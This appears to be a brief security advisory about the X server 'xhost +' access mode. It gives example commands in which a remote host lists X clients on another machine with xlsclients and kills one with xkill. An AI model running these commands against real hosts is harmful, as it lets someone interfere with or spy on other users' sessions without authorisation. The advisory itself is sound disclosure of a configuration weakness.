COMMAND

    xhost

SYSTEMS AFFECTED

    Systems running X server in "xhost +" mode.

PROBLEM

    myhost% xhost + bad

    anyone from bad can do quite a lot of things on myhost through the
    X server, even if you do not allow remote shell between myhost and
    bad.

	Example:
	Start a client on myhost, say xeyes, with xhost + bad

        myhost% xhost + bad
        myhost% xeyes &

	Then from bad, do a:

        bad% xlsclients -a -l -display myhost:0

    you will get, among other, something like:

        bad% Window 0x5000007:
        Machine:  myhost
        Name:  xeyes
        Icon Name:  xeyes
        Command:  xeyes
        Instance/Class:  xeyes/XEyes

    Then you can do:

        bad% xkill -id 0x5000007 -display myhost:0

    And guess what, you just killed a process on another machine
    without using remote shell (if you did not own the process, it
    would just have worked as fine).  An there are a lot of other
    tricks you could use ...